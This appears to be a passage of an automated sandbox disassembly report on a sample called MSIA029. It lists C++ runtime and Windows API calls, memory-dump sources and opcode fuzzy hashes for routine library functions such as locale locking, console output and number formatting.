                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42CAC
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42CCC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 1067678da9da8b224384e56479c4edb1ad803cfbbba5ebc044502e784d1f4d2f
                                                                                                                                                                                                                                                  • Instruction ID: 18066facfc310acf9f892b381b8357230f48d7354ae179bb3c25c57d427d0f86
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1067678da9da8b224384e56479c4edb1ad803cfbbba5ebc044502e784d1f4d2f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA01C035901219DBCB15EBA89C816BE7BA0AF80730F250419FA106B3D2CF789E01BB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42EA5
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42EAF
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42F00
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42F20
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 593ef2adb51cacdf4f9a065b53df5ffaceb238e0abfb2c69f02224e7bcbb619a
                                                                                                                                                                                                                                                  • Instruction ID: af66b203ffaf989b298bd33322cc3cd7dcddd86842dfad7460ed29276f719b0f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 593ef2adb51cacdf4f9a065b53df5ffaceb238e0abfb2c69f02224e7bcbb619a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A01D231900219DBCB05EB64DC41ABE7B70BF80720F640459F914AB2D2CF789E05FB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42E10
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42E1A
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42E6B
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42E8B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42F3A
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42F44
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42F95
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42FB5
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000), ref: 00F7369D
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?,?,?,00F7271F,?), ref: 00F736A9
                                                                                                                                                                                                                                                    • Part of subcall function 00F7366F: CloseHandle.KERNEL32(FFFFFFFE,00F736B9,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?,?), ref: 00F7367F
                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 00F736B9
                                                                                                                                                                                                                                                    • Part of subcall function 00F73631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F73660,00F73040,?,?,00F72198,?,?,00000000,?), ref: 00F73644
                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?), ref: 00F736CE
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SleepConditionVariableCS.KERNELBASE(?,00F52CBD,00000064), ref: 00F52D43
                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52D4D
                                                                                                                                                                                                                                                  • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52D5E
                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00F8DD3C,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52D65
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3269011525-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F3EC8E
                                                                                                                                                                                                                                                    • Part of subcall function 00F3D87C: __EH_prolog3.LIBCMT ref: 00F3D883
                                                                                                                                                                                                                                                    • Part of subcall function 00F3D87C: std::_Lockit::_Lockit.LIBCPMT ref: 00F3D88D
                                                                                                                                                                                                                                                    • Part of subcall function 00F3D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D8FE
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F3EE8A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F3ECF6
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                  • API String ID: 2544715827-2799312399
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F462C8
                                                                                                                                                                                                                                                    • Part of subcall function 00F42D74: __EH_prolog3.LIBCMT ref: 00F42D7B
                                                                                                                                                                                                                                                    • Part of subcall function 00F42D74: std::_Lockit::_Lockit.LIBCPMT ref: 00F42D85
                                                                                                                                                                                                                                                    • Part of subcall function 00F42D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00F42DF6
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F46502
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F4633F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                  • API String ID: 2544715827-2799312399
                                                                                                                                                                                                                                                  • Opcode ID: 028d0d592a0552ecc1357c9bc8303b4b20c0b78e03a9b4be12bb49d4cfdf7f21
                                                                                                                                                                                                                                                  • Instruction ID: 0fa03c27b7eaf24da48848d151da7b90cd2649181cb596d69bc7419f967b0e09
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 028d0d592a0552ecc1357c9bc8303b4b20c0b78e03a9b4be12bb49d4cfdf7f21
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40C19370E042588ADF25DF68C8417BCBFB1BF16314F588099DC89EB286DB349C85EB52
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4669E
                                                                                                                                                                                                                                                    • Part of subcall function 00F3B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00F3B8DD
                                                                                                                                                                                                                                                    • Part of subcall function 00F3B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00F3B900
                                                                                                                                                                                                                                                    • Part of subcall function 00F3B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B928
                                                                                                                                                                                                                                                    • Part of subcall function 00F3B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B9B7
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F468D8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F46715
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                  • API String ID: 3042121994-2799312399
                                                                                                                                                                                                                                                  • Opcode ID: 01fcb1838a07d193ea8efc2226609bd96879ed11dc4e1a4ac537a093feb20da4
                                                                                                                                                                                                                                                  • Instruction ID: 0ac4b3745aa7a34a63068922a4012f1bac3030f2d7185fefaa1111a051f2357d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01fcb1838a07d193ea8efc2226609bd96879ed11dc4e1a4ac537a093feb20da4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25C18130E042588BDF25DF64C8517ACBFB2BF12314F548099DC89EB282DB788D85EB52
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00F61AFD
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                  • Opcode ID: dc2709dc918e9e76310cf78198a6a277b94c5e44d2fa57aa3803b8a9c77382eb
                                                                                                                                                                                                                                                  • Instruction ID: 5bf0a6f4a5c5073ab4dd1a24a1eaf3a91e0ed5e973ecf3bfe86dc056544bf0d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc2709dc918e9e76310cf78198a6a277b94c5e44d2fa57aa3803b8a9c77382eb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97515C61E49205CACB117754CE1237E77A0FB40721F284958E0D5922A9FA3A8CD5BE87
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                                  • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                  • API String ID: 3732870572-1956417402
                                                                                                                                                                                                                                                  • Opcode ID: 194e6d676b7896fc27234fba76c0aa4acfd93a59577db7df8cae8972153aa65d
                                                                                                                                                                                                                                                  • Instruction ID: b5b19d3837358485fb38d125b9cff2d672e449445ab5f4d94370fb687a996228
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 194e6d676b7896fc27234fba76c0aa4acfd93a59577db7df8cae8972153aa65d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC512230F04284ABDB258E6C88817BE7FF57F46362F14415AEE81D7281C374A94AE760
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00F3BF6E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                  • API String ID: 118556049-2658103896
                                                                                                                                                                                                                                                  • Opcode ID: 3438cc7b02cfc3b665b2b0267e9f91f872c6f167da73d32409b4b5f45dda45e4
                                                                                                                                                                                                                                                  • Instruction ID: 4c0b20f3768451d753a935661439597ab0e5da1f14d57ad2ad47b8c33471abe5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3438cc7b02cfc3b665b2b0267e9f91f872c6f167da73d32409b4b5f45dda45e4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0951C3B1D007489FDB10DFA4CC41BEEBBB8FF05314F14426AE905AB241E774AA85DB91
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                  • API String ID: 0-3019864461
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4D501
                                                                                                                                                                                                                                                  • _swprintf.LIBCMT ref: 00F4D573
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F42FC8: __EH_prolog3.LIBCMT ref: 00F42FCF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                                                                                                                                  • String ID: %.0Lf
                                                                                                                                                                                                                                                  • API String ID: 3050236999-1402515088
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4D7A5
                                                                                                                                                                                                                                                  • _swprintf.LIBCMT ref: 00F4D817
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                                                                                  • String ID: %.0Lf
                                                                                                                                                                                                                                                  • API String ID: 1487807907-1402515088
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F5188E
                                                                                                                                                                                                                                                  • _swprintf.LIBCMT ref: 00F51900
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                                                                                  • String ID: %.0Lf
                                                                                                                                                                                                                                                  • API String ID: 1487807907-1402515088
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F5607E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EncodePointer
                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3___cftoe
                                                                                                                                                                                                                                                  • String ID: !%x
                                                                                                                                                                                                                                                  • API String ID: 855520168-1893981228
                                                                                                                                                                                                                                                  • Opcode ID: 826f9ff01f41c2348e8f6cde7de7c48a8b565be0b8bb9adc0685f8b6e840c9c3
                                                                                                                                                                                                                                                  • Instruction ID: d1f51bb882d5159283e69f32e07dab1cddc9589a650cac6eab93433c4b75d484
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 826f9ff01f41c2348e8f6cde7de7c48a8b565be0b8bb9adc0685f8b6e840c9c3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11318B71D0020DEBDF04DF98E881AEEBBB6FF48314F104419F905A7251DB79AA49DB64
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3___cftoe
                                                                                                                                                                                                                                                  • String ID: !%x
                                                                                                                                                                                                                                                  • API String ID: 855520168-1893981228
                                                                                                                                                                                                                                                  • Opcode ID: ee0aa8fd6db1a64965e9bbc616a427f0016edf76033f2694c67caf1cc178f137
                                                                                                                                                                                                                                                  • Instruction ID: 09744c04664cd3f027451f50d36265e08ce6fe851eb23ad5b87494e88b3d52a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee0aa8fd6db1a64965e9bbc616a427f0016edf76033f2694c67caf1cc178f137
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A315A32D15258AFEF01DF98DC41BEEBBB5BF09311F100019F944A7242D779AA49EBA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00F35F86
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,80A20388), ref: 00F35FF6
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
